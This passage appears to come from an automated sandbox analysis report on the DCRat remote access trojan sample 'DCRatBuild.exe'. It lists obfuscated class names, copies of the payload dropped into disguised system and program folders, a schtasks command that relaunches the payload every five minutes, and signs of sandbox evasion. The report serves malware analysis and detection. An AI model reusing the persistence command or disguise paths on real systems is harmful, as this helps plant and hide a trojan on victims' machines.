            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, mkaNOOiu1fppM1vEm4.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'bidWPMi9hXRfwjqNkCq', 'TXgkN6iGyDJRRpiNVn5', 'oV2lDEix48WWBv9fcRJ', 'UYrfcZifyw8SDtbcMRW', 'urvSTri6ZY3GR2oUK32', 'K7sRioitZQXbg1K46Ca'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, oHNXMy1NgHLvYQhmElK.csHigh entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'dNs5F6xHKHCtiaLhLfn', 'pAwCdQxAugGUfZd5YQ5', 'qsnI8pxVjymRDlAiZmv', 'VrKHBcxqHqZYSjbeIVe', 'bS3itpxID1gdqQUatLj', 'kexs3oxioG7rAfjLqsu'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, vdX4HB0KTgOBXGur3Q.csHigh entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'TTjEbltxJ', 'Bv4KnnVvvGZkXdyNeBX', 'EhUFkgVEJQEkOL0VLv4', 'KlCdWOVe57mrCqBIikp', 'hAkBJXVLPaFQUvRvSRY', 'lifF9CVuFp2vlI206d8'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, KcJDbFfC3DNhp6PdPG9.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'BLrMXRm9C0', 'OBZsQGEEX2', 'lndMyH3yZP', 'X2STQL8Y17QLJM1a4c3', 'jBM5Ux8JgHRdO8G1aof', 'DVI0mA8MQCix27Keq5N', 'AoIGcm8jKZKIEigMEys', 'cYg5th80Sm4pkxCUNvu'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, sa2LD81iN9jvbHnyqYo.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'xBU2lQtPINJBcunG4YK', 'W6w6NXtDSCZc6NDthDn', 'KX1lIxtg9GueQYbvWh8', 'RDgiogt8HWJbIoxudhk', 'jJPAyBtnFQtCR6geHOG', 'm1LDM7t4pxOuQglIbDa'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, RjYdka8VUfxTCkuPy8.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'emS2v1irlXvaN6fingI', 'WxikmMi5QGkIRYdV72q', 'CHfgksis0bevLEhufKC', 'XB8ecrikZoBEnqXW2uE', 'VJavX7i2kvg3nqtLh5J', 'KXCPcdidu9awhPrh38Y'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, BtY0LefQ0AHEZt0pwhq.csHigh entropy of concatenated method names: 'ybfYhj1fgP', 'tEiYEnfwIJ', 'QmpYlFgfMF', 'vpYYqi6Dil', 'fmQYCwqwHm', 'M4gYdDuaRi', 'QShlwrZ7fXaD3NsyeaY', 'rL6QhZZFLCtEdmiS9Nk', 'l0ThxbZTNR0VtHCIjtl', 'yWiPsgZQi9eQWSr5CDT'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, CpUo31OI4nMA2NX4kN.csHigh entropy of concatenated method names: 'GQcGbZDqf', 'FK9Bc3yZM', 'lH874u8WT', 'rLcQMKAL2bQb8UeFM26', 'eQvjRnAE7QlhCe9fYpU', 'bHMpTPAecAATFnn5G2y', 'iFxZkOAukKpEvsmh2Yx', 'ma7ppTASUFlF8MWhE4i', 'TBvP8qAXCnWIL74ygOt', 'ex4BdrAo3J7uC6mNJyh'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, ysPEmGnfkBKp6Pe80lF.csHigh entropy of concatenated method names: 'GRjF6sCgyZeI7SE6JSA', 'mwh88AC8FsABGpkOZqB', 'nr2PBYCP1aAWfKUBErB', 'Df1ToJCDWV4TOCX1dDe', 't1QtAAbjCQ', 'lQKxbaCNrpAjnir5sra', 'sVAhjXCFFqCe5k7yL1o', 'vILgqcCnYObjZjND2gL', 'uEnPpsC41TFC310SQFv', 'phkmfxCTsEW524Hp645'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, o2KOyQhJIjgo267adR.csHigh entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'lR6fP7ItKXwlGyaZ9lc', 'vggRHXIcAR9qQJV2TfW', 'CX54IdIwlvAF0cUxZu2', 'OsCVTDIYTEgRIKeHZGM', 'jygidmIJ6Q087iGm3ap', 'kIkiZFIMWVDLXg69JwM'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, aC3Ov8QP2CxcBt18iNk.csHigh entropy of concatenated method names: 'kJSuBvVVKu', 'U2bu757y11', 'Y6SugwbFVm', 'zlHuXbvG6P', 'CZGuMXR79P', 'QfMdkZ4d3M58nqPHDJ2', 'kCNW174zPOJMxe0lnOj', 'Gvk7vE4kHdVRbqn0u6m', 'cJsVHk42pI5FCaPou45', 'T2SLm4NHpRIdh4db60O'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, TSCIaOIx0hjXyskiOq5.csHigh entropy of concatenated method names: 'BTdf9wDFtY', 'tAeJwxJq9X9sxWq8KKe', 'pHreMYJIkvgc4HRTieE', 'nNAUGTJAvrlW3m0D0yF', 'Wi2dcRJVBSeLYZrvcYH', 'aTKkkjJig1t7aLxGfnr', 'CRZCp0J9iataktcN8GI', 'wuDpcEJGts35NaGy0Hy', 'P5EClyJxwHfn33aHJgd', 'V7TV2VJf9EFDkahlwn5'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, SNXm4AfNO4hHNLDNgqm.csHigh entropy of concatenated method names: 'Q312oJfgSS', 'BPc2F80yES', 'h1n2WtY4VP', 'gso29kZC3O', 'X822vCxcBt', 'nTqTLTD9umBK5olGtMj', 'gJW8XiDGRjilqvu4Udk', 'vrcYbXDIbNOgvdNblqX', 'A9tUegDiTDlqaxiF56f', 'uewS4hDx4YgWyHIhm4f'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, glEcPYQ8T2A99AIlRUf.csHigh entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, A3uninIyfN0hCy6qBF2.csHigh entropy of concatenated method names: 'baQf8M7axU', 'y3PfD0MIOf', 'nv8epcJZUH2dXIsESty', 'd8APL4JynNn8BqTvEvj', 'nhkS9gJP7R73rSLbuml', 'OTdjaOJDfbwqpwcTnTL', 'F6PJkoJgYijOCsJ5Wod', 'VHyY9lJ8WhvubGGVRdR', 'BeYok5JnT2RVSIG7DiV', 'rI0veKJ4BDfBEF9bLFt'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, aW2pwAnWLDFJi0UpVKV.csHigh entropy of concatenated method names: 'ToTRQhwWHH', 'rwLRnAItTJ', 'K7cRm22Jb4', 'aYHRYTfHSk', 'EsfR2O60eB', 'OAPR6d5CFP', 'uxmRsCZaO9', 'VLURayjhrt', 'NtlRulA98H', 'DcnRPZuDaF'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, dpYdqsmwElxsgcqBAx7.csHigh entropy of concatenated method names: 'c7y3c9lS70', '_1kO', '_9v4', '_294', 'dj734u3MpN', 'euj', 'JnE3Ah6vAO', 'j8o3RyIFjD', 'o87', 'q9Z3OMHgsF'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, jBCUvq1VlYREnO5m9Im.csHigh entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'OAQHMdxnTfhS6UKsR6I', 'bSTJxDx4paN9qDsg31b', 'rj6IWYxNxO8k6F7DmMh', 'W410RqxF5lN5AuK5mNE', 'jOGaOHxTiwpIXZ1eQVV', 'nRYwGFx7B4JotmiPujP'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, OvSKO71awqCseY3EYhf.csHigh entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'A1iOTcGZCdWHsqceUYG', 'BXQEQOGy5LnTc4jh4Sc', 'uVguPtGP6kfm3fdu3oo', 'mpCoSPGDd5fdATiqD6d', 'A5jE6CGg671QPYs3SpK', 'Q5c0RkG8WVRNH8d6SO9'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, p3tsfvIMgVWhQdF90Fr.csHigh entropy of concatenated method names: 'sjdm2vo2lM', 'E94m68SqGl', 'kKRgXeO5jRJ2kmmEyZU', 'kJkHNsOs71TQavoRt7v', 'Rk4u43Oan6Mih2wsTMP', 'qPGGryOr7Sk9awptDLT', 'p5GmyXlVTh', 'HqeYrABHW9wr2YlAIEi', 'RSNARBBAhwlGJnIRHid', 'UswXJXOdJjWg4YqbMdw'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, suG3iw1ri6A9xseaA2N.csHigh entropy of concatenated method names: 'Xee1qoy5cR', 'wSLO2a6VEUuqOY4G3qw', 'ichAmb6qX8puZpxfIhg', 'mq0vIO6H15yXhn7e3tK', 'YuLjij6AfEu26DtUsij', 'h8RDkg6IIgTnT0ArO6V', 'oxIPue6ioB4Xv91maHn', 'ASYf4i69N4rvVK7Yyyn', 'anI1dt8oXN', 'XdmLBm6fCimSZoUpbIX'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, UsPvByz6Qq2KO8H1Wy.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'Vs3IIT9qnJZowE7HO8T', 'BiWmhR9IASeHKPlRkgH', 'UrxNjt9iwmpxU3E0amu', 'k05mbV99Q3kli1KdnVs', 'o8ye1L9Gkb7snPQoCeq', 'RadlNo9xx2nisdDYLeY'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, JL2nwxn683rRYjWH3Ib.csHigh entropy of concatenated method names: 'V1QAtatDVA', 'hk7A5Eh0OC', 'Mt8J1QErDwiG5Du4xVn', 'Kfkkh9E5xsGTKiM4txq', 'IWMB22EshYNdMO4ea9g', 'IBRV1uEkNk5dRKmZffa', 'sVSL9IE2Ehtq4k1I2Cm', 'qK8XXhEdRy8OQGiyDwj', 'u8Ee4sEzaUG3nMOYiXQ', 'NvSoTCeHpORBQlabJ5p'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, JaAlfifpDrx5IUw2U78.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'RMIsakpWGE', 'luVMwGlBUa', 'TDVsuTgsSm', 'rC5MN3AuXb', 'xLUPWs8LacFdxcbF6sO', 'fKZHAH8uJP3WmgKrTfQ', 'hfhyqI8EpagNUInAe5U'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, pqlU0xYC9WBKkseoZ1.csHigh entropy of concatenated method names: 'NU0exC9WB', 'Iy5bJIC8RfsnSkT1gF', 'YRt4qe3k8igRJEpLr6', 'Yrh0hmhcjkyC4hhZkY', 'exhYp9bAGjCKs0cLDC', 'ywo2mEvrqLJq0opI0h', 'DxZIxP4vE', 'q0efMdkkA', 'jbtQuORBn', 'JB8n5OUk9'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, Bgn2UD1g7350nNQAMGI.csHigh entropy of concatenated method names: 'Dub189IZUn', 'PMD3So6en8uENUqnlWi', 'lDmLHA6LoSZ59MrwsQW', 'lwaUQk6v0nqf6LHMWMp', 'JIlfw96EsnZG7SmkW5p', 'iIKWvl6u3PZpGH8JGqh', '_3Xh', 'YZ8', '_123', 'G9C'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, nyPRrcQHsZGD5KYLPEA.csHigh entropy of concatenated method names: 'u6ne060nJ4', 'yMZeGKCCcn', 'AXmeBiHbIi', 'JbEe7yuWQo', 'x4VegvBGtt', 'ekS4JUFZYmaNUtnl19d', 'UZvAgxFOdUB1n87WQ65', 'vwcwG8FBY25HvdEFm75', 'u5ISWmFyTKU5DopN2pY', 'uGMvnTFPga48wsFaYD2'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, raqxiEBM8xrpHatTvQ.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'x2g5ZwV2EfmVK0cjEwg', 'M3xGf6VdEp65QIVDVE3', 'lovNksVzAXmEZQ1XlCX', 'tbP0xRqHQ7qQ6YtL8Ze', 'IfW0NrqAk8TB3xHH9in', 'KuRIDZqVibpr5PMl8op'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, zb2UlpFHkSTklRr5oa.csHigh entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'imO1EIiTY9VlnKhhhpq', 'QnRjL7i7JZXsMHwJAiS', 'hSpGGhiQMS1o5JQ3bjG', 'X9icePi3q4JqSgxvJXl', 'B25tGZihiQiWliEVKCh', 'cwQjSwiCPEp0fYkyCXp'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, FCkR8EQFLB9yQhURlYe.csHigh entropy of concatenated method names: 'uSyx8VHl4g', 'xxpxGaZNR7', 'fC2xBrQJn8', 'wvNx7Qv40l', 'TM9xgWepfv', 'txPxX4VSZe', 'R3vxM2nVsA', 'XkMxSV8HNU', 'XNhxhK0Wyx', 'IckxE7C8TG'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, b0aIlr1lNKlfGdpiHL4.csHigh entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'fQZRXst9mb8Cgr4sAHM', 'LZ39ZVtGyrpkp2QV2U9', 'O6sdk7txedbASwhMbAK', 'P7hqxOtfx8YH1HKJiaF', 'ynHXpMtIEhrBaNNNIi2', 'Dnv4y8tigWoUkiTNj9D'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, QwDFtY1pFu4gKbdC1aQ.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'OkigDFthGPcCPOkcRIc', 'HWgCvVtCwu2VRbBKxAW', 'So9yDmtbZEXua3SvkOF', 'hsccGPtvlMTqdMFfxd2', 'IgaJ5ttEd9mvVxyoEPZ', 'HeDok7te5Lh5nQH2KrN'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, pgesf3fxl3jKT3XiUYg.csHigh entropy of concatenated method names: 'ksP2ELKdSt', 'r9y2l8b5ir', 'QPl2qsiWHl', 'HRH2C21JvU', 'brarpCPbG9xKcLP4XcL', 'U38adLPvIVwoAthQhcX', 'TfscWNPEGkRwwm7sj9c', 'AiopfiPhYGmNN4Ewsca', 'Mtoda0PCVNgsd3vhM19', 'mLIRRZPeKpjAMsEyMDy'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, ES9VhuIIPWkEdSlAEcd.csHigh entropy of concatenated method names: 'cdXId6KXri', 'C09IimXDNc', 'mSsIwI8Dln', 'hQTIp0Jjim', 'I0xIoJKZrH', 'GAjIFrMLKt', 'p9DZTSwOerxcHm72ckb', 'eEWCBdwBk4Co9ksJBx2', 'r1I5qrwjAs8QqM0TfZS', 'qdPMdgw0aI4xx9n4vOw'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, F4Aopy1FyJuFAfQL2hY.csHigh entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'lA9cQltKMjDx8J9rFH9', 'w9gk8ctl1QmZGEb2hFE', 'nupsT8tUXSB3CVenfQn', 'OvWVVLta8MiVnJLLbj6', 'v88l4htroEdHxbSLrS4', 'E1ECdEt5JcBqZxcQwJF'
            Source: 0.3.DCRatBuild.exe.718f543.1.raw.unpack, WmXDNc1UxSsI8Dln6QT.csHigh entropy of concatenated method names: 'pQJ13Ijgo2', 'kNRj4rxO0TUX8dYVWTU', 'aJFwllxBPFkIdvMV9F6', 'JJ4LaIxjfZPQbZmhk2U', 'xZ8p3Tx0GVWZaMmkabP', 'xxikaZxZrf00HFEAM9D', 'kENb2jxyHY86BprDemH', 'JU9CtqxPgnDnV07Plsc', 'yWFLtZxDS4fPQbUEsD0', 'f28'

            Persistence and Installation Behavior

            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\dfVXJbANbh.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    File created: C:\Users\Default\Videos\dfVXJbANbh.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    File created: C:\Program Files\7-Zip\Lang\System.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    File created: C:\Users\Public\Music\dfVXJbANbh.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\dfVXJbANbh.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    File created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe
            Source: C:\Users\user\Desktop\DCRatBuild.exe    File created: C:\ChainBlocksurrogateagentFont\portperf.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    File created: C:\ChainBlocksurrogateagentFont\dfVXJbANbh.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    File created: C:\Windows\SystemTemp\Crashpad\RuntimeBroker.exe
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    File created: C:\Program Files (x86)\Windows Multimedia Platform\dfVXJbANbh.exe

            Boot Survival

            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dfVXJbANbhd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\dfVXJbANbh.exe'" /f
            Source: C:\Users\user\Desktop\DCRatBuild.exe    Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wscript.exe    Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe    Process information set: NOOPENFILEERRORBOX
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe    Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe    Process information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Process information set: NOOPENFILEERRORBOX (35 identical entries)
            Source: C:\Program Files\7-Zip\Lang\System.exe | Process information set: NOOPENFILEERRORBOX (71 identical entries)
            Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Memory allocated: CE0000 memory reserve | memory write watch
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Memory allocated: 1A850000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Memory allocated: 8B0000 memory reserve | memory write watch
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Memory allocated: 1A510000 memory reserve | memory write watch
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Memory allocated: 1030000 memory reserve | memory write watch
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Memory allocated: 1AD80000 memory reserve | memory write watch
            Source: C:\Program Files\7-Zip\Lang\System.exe | Memory allocated: 2A40000 memory reserve | memory write watch
            Source: C:\Program Files\7-Zip\Lang\System.exe | Memory allocated: 1AC60000 memory reserve | memory write watch
            Source: C:\Program Files\7-Zip\Lang\System.exe | Memory allocated: 12B0000 memory reserve | memory write watch
            Source: C:\Program Files\7-Zip\Lang\System.exe | Memory allocated: 1AD70000 memory reserve | memory write watch
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 3600000
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 3599890
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 600000
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 599874
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 599765
